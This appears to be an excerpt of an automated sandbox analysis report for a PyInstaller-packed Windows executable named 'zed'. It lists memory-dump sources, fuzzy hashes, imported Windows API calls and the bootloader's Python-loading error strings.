                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                • Instruction ID: 21707feab50fe4e9077655467d510d1e6b40ee7c90cc123b1f950622f6403859
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3131B436618F8586DB60DF25E8603AEB3A4FB94B58F90013AEA8D83B54DF3CD155CB11
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                • Instruction ID: 3f725b4ab742de711de4cfd714b6d803eee63a21a4b2089f5bd36ebef4401996
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B1DF26B38A9A41EA61BB2196203B9E350EB64FD8F84513BDD5D87BC6DF3CE441C311
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                • Instruction ID: a46f8d9ddfb6205a5a2da69bc7c70948c2d752eedcc0576a9fbd6303d5b6ad99
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D115126B24F098AEB00DF61E8643B973A4F729B58F840E36DA2D86764DF3CD1548751
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                                • Instruction ID: 399f4cf5ac5ae5748ed027254b981191e7579b97201d46f07ceec72b5db1e131
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B09B14E17B05C3E90437115C9231472647F64B04FD4013DC00C81330DE3C20E55711
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                • Instruction ID: 67cf022cd6790cfe2e57413e2b58609dc4db668dfa3ea703a7be188aac47b4e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF068727286958BDB989F6DA812729B7D0F7187C4F90803ED58DC3B04DA3CD0918F15
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                • Instruction ID: 07f610cdef56c3d18995f696d76d730fc40d71681d2300b06983e821773f1fa3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDA0012592CE0ED0E648AB40E8B0235A264BB64B09BC0047AE00D910A09E3CA4049722
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E5305840
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E5305852
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E5305889
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E530589B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E53058B4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E53058C6
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E53058DF
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E53058F1
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E530590D
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E530591F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E530593B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E530594D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E5305969
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E530597B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E5305997
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E53059A9
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E53059C5
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E53064CF,?,00007FF7E530336E), ref: 00007FF7E53059D7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                • Instruction ID: a61fc82cdda4d6f330945dfad1c39bf55949ecfd5dfeea9ac99d7c421c595f8a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B22AE68A29F0F91FA16BB55A830774A264AF34F4DBD4913FD51E82250EF3CB5448363
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5309390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E53045F4,00000000,00007FF7E5301985), ref: 00007FF7E53093C9
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7E53086B7,?,?,00000000,00007FF7E5303CBB), ref: 00007FF7E530822C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5302810: MessageBoxW.USER32 ref: 00007FF7E53028EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                • Instruction ID: c361d0c851726143fc51e88add23be6371073530359606f526fc8aba345b4767
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B551B715A38B4A41E610BB25D8713B9E394AFB4F8CFC4443BD60EC26D5EE7CE0058762
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction ID: f32e6a764a8a3cc8db9e4eef800c17330522ee8a5810c076a9d107c48d64a745
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A512B26514BA186D6349F22F4682BAF7A1F7A8B65F004126EFDE83694DF3CD045CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                • Instruction ID: 1ec5249bd1d39c29a6c5ecd6525197e0c77ff2638b5dbc03490b18988ec8f720
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A212B25B28E4A81E7056B7AA874379E254EF54F9CF884136DA1DC37D4DE3CD4504322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction ID: 95e9750a6f04cf89b07c4b41309c011d97bc75e8d6ce3f42f58f5467611d18c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2712A761E2C14786FB207A64D224379B651EB60F58FE4413FD69A86DC5DF3CE5408B22
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction ID: 62ef9b3721eb252e0efbbf3e904ddf38f36b502700c9aa9068f1cee680f3f6e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63129762E2C14785FB606A24E2643F9F6A1FB60F58FC4403BD689865C5DF3CED408722
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
                                                                                                                                                                                                                                                • Instruction ID: 89ef064b59361d321fa61e2b965f7593acbb60e995ac356f147b5bb3c25ebb05
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B641A621B2865A42EA14FB11A8207B9E394BF64FCCFC4443BED4C87786DE3CE5418362
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
